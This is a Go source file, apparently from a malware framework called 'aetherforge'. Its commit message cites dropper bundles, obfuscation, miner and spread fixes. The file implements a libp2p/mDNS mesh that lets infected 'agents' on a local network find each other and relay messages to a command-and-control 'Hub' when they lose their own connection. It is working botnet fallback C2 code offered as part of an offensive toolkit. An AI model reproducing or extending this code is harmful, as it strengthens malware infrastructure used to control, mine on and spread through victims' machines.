WS ticket dashboard auth, builder universal signing/size limits/fusion obfuscation/dropper bundles, Path Tracer WireGuard topology, SessionGate degraded mode and download timeouts, server bootstrap (data dir, cloudflared dedupe, config port precedence), agent mesh/miner/spread fixes. README refreshed; usb bundle repacked; PROBLEMS.md audit log updated.
146 lines
3.5 KiB
Go
146 lines
3.5 KiB
Go
//go:build p2p
|
|
|
|
package client
|
|
|
|
import (
|
|
"context"
|
|
"encoding/json"
|
|
"fmt"
|
|
"log"
|
|
"sync"
|
|
|
|
"github.com/libp2p/go-libp2p"
|
|
"github.com/libp2p/go-libp2p/core/host"
|
|
"github.com/libp2p/go-libp2p/core/network"
|
|
"github.com/libp2p/go-libp2p/core/peer"
|
|
"github.com/libp2p/go-libp2p/p2p/discovery/mdns"
|
|
)
|
|
|
|
const MeshProtocol = "/aetherforge/mesh/1.0.0"
|
|
const DiscoveryTag = "aetherforge-mesh-discovery"
|
|
|
|
// MeshNode represents a libp2p peer on the local network.
|
|
//
|
|
// Relay limitation: mesh uplink is one-way. Orphaned peers may forward messages
|
|
// to the Hub through a connected relay node, but Hub responses are not sent back
|
|
// over the mesh. Treat mesh as a best-effort share/stats uplink, not full C2.
|
|
type MeshNode struct {
|
|
mu sync.Mutex
|
|
host host.Host
|
|
mdns mdns.Service
|
|
client *AgentClient
|
|
}
|
|
|
|
// NewMeshNode creates a new P2P fallback node.
|
|
func NewMeshNode(c *AgentClient) *MeshNode {
|
|
return &MeshNode{client: c}
|
|
}
|
|
|
|
// Start initializes the libp2p host and mDNS discovery.
|
|
func (m *MeshNode) Start() error {
|
|
m.mu.Lock()
|
|
defer m.mu.Unlock()
|
|
if m.host != nil {
|
|
return nil
|
|
}
|
|
|
|
// Bind to any available local port automatically
|
|
h, err := libp2p.New(libp2p.ListenAddrStrings("/ip4/0.0.0.0/tcp/0"))
|
|
if err != nil {
|
|
return err
|
|
}
|
|
|
|
// Register the protocol handler for incoming mesh streams
|
|
h.SetStreamHandler(MeshProtocol, m.handleStream)
|
|
|
|
// Start mDNS discovery to find other agents on the LAN
|
|
ser := mdns.NewMdnsService(h, DiscoveryTag, m)
|
|
if err := ser.Start(); err != nil {
|
|
_ = h.Close()
|
|
return err
|
|
}
|
|
|
|
m.host = h
|
|
m.mdns = ser
|
|
log.Printf("[Mesh] P2P Node started. PeerID: %s", h.ID().String())
|
|
return nil
|
|
}
|
|
|
|
// Stop tears down mDNS discovery and the libp2p host. Safe to call multiple times.
|
|
func (m *MeshNode) Stop() {
|
|
m.mu.Lock()
|
|
defer m.mu.Unlock()
|
|
if m.mdns != nil {
|
|
_ = m.mdns.Close()
|
|
m.mdns = nil
|
|
}
|
|
if m.host != nil {
|
|
_ = m.host.Close()
|
|
m.host = nil
|
|
}
|
|
}
|
|
|
|
// HandlePeerFound is a callback for mDNS discovery.
|
|
func (m *MeshNode) HandlePeerFound(pi peer.AddrInfo) {
|
|
m.mu.Lock()
|
|
h := m.host
|
|
m.mu.Unlock()
|
|
if h == nil || pi.ID == h.ID() {
|
|
return
|
|
}
|
|
log.Printf("[Mesh] Discovered peer on LAN: %s", pi.ID.String())
|
|
if err := h.Connect(context.Background(), pi); err != nil {
|
|
log.Printf("[Mesh] Failed to connect to peer %s: %v", pi.ID, err)
|
|
}
|
|
}
|
|
|
|
// handleStream processes incoming messages from orphaned peers.
|
|
func (m *MeshNode) handleStream(s network.Stream) {
|
|
defer s.Close()
|
|
var msg Message
|
|
if err := json.NewDecoder(s).Decode(&msg); err != nil {
|
|
return
|
|
}
|
|
if err := m.relayToHub(msg); err == nil {
|
|
log.Printf("[Mesh] Relaying %s message from orphaned peer to Hub", msg.Type)
|
|
}
|
|
}
|
|
|
|
// relayToHub forwards a mesh message to the active Hub WebSocket session.
|
|
// write() acquires AgentClient.mu — never read client.conn directly (data race).
|
|
func (m *MeshNode) relayToHub(msg Message) error {
|
|
if m.client == nil {
|
|
return fmt.Errorf("mesh: no agent client")
|
|
}
|
|
return m.client.write(msg)
|
|
}
|
|
|
|
// BroadcastToMesh sends a message to all connected P2P peers.
|
|
func (m *MeshNode) BroadcastToMesh(msg Message) {
|
|
m.mu.Lock()
|
|
h := m.host
|
|
m.mu.Unlock()
|
|
if h == nil {
|
|
return
|
|
}
|
|
for _, p := range h.Network().Peers() {
|
|
s, err := h.NewStream(context.Background(), p, MeshProtocol)
|
|
if err != nil {
|
|
continue
|
|
}
|
|
_ = json.NewEncoder(s).Encode(msg)
|
|
s.Close()
|
|
}
|
|
}
|
|
|
|
// PeerCount returns the number of connected mesh peers.
|
|
func (m *MeshNode) PeerCount() int {
|
|
m.mu.Lock()
|
|
h := m.host
|
|
m.mu.Unlock()
|
|
if h == nil {
|
|
return 0
|
|
}
|
|
return len(h.Network().Peers())
|
|
}
|